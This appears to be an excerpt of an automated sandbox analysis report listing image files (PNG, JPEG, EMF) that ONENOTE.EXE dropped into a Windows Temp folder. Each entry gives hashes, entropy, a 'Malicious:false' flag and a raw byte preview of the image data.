                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9B3DA864-67E2-4E73-9A41-B2D4622D20B0}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, progressive, precision 8, 1692x810, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88911
                                                                                                                                            Entropy (8bit):7.701779182597222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:4a+us0Yfpw9/WFi5HrTy2NtTWR7f2f5RNzQiiiiiiiiiiiiiimL1Vmwwn:4aA0YRw9/WITtTWR7IbNzvL1an
                                                                                                                                            MD5:4D5F7AFD30851031376DA0FA6D0E3F80
                                                                                                                                            SHA1:02154E502F09DDD49FFB8F55D0651FFCD7379B94
                                                                                                                                            SHA-256:F918BB0C65D2F90593265FE4087B9C6905148BD7B46579D902B9ABD5415415F5
                                                                                                                                            SHA-512:ED8BF498C66F59D252DA77CA490B067AF4106F3EA421A024C1C56D2AB63037B0E8BA71961D06370DB76773B08E1BE298C770395DD6CB131F2CE48BDF1D11711B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9C0281B2-0A24-424A-9419-5303FBECBB90}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):7.837610270261933
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                            MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                            SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                            SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                            SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9C73E31F-2482-4216-AB58-83AB644A4DF0}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9CEA5842-E887-43E7-BB7C-D66E88BC754E}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9CEDDB7F-1248-4201-8A34-18534FFF76A4}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9D18AFF3-5300-4BD5-A8E6-CF4FB43C2FB7}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9D1DFE74-7CE9-4117-87E6-05A6ECA0B916}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59832
                                                                                                                                            Entropy (8bit):7.308211468398169
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                            MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                            SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                            SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                            SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9EAF288A-3963-4AC7-B948-86925BD04A01}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9EE225A8-BC67-4A30-A2E7-3F210E69548D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32656
                                                                                                                                            Entropy (8bit):3.9517299510231485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                            MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                            SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                            SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                            SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9F983E1F-90BD-491B-90A3-2E04BFD845BC}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A04B0925-B1CD-4D98-9D27-6F17DB2C20B6}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11040
                                                                                                                                            Entropy (8bit):7.929583162638891
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                                                            MD5:02775A1E41CF53AC771D820003903913
                                                                                                                                            SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                                                            SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                                                            SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A1F9D3C0-3E03-4B8C-B313-18F7D0661744}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84941
                                                                                                                                            Entropy (8bit):7.966881945560921
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                                                            MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                                                            SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                                                            SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                                                            SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A31875D8-8F8C-46BB-944D-FA8972517EF4}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
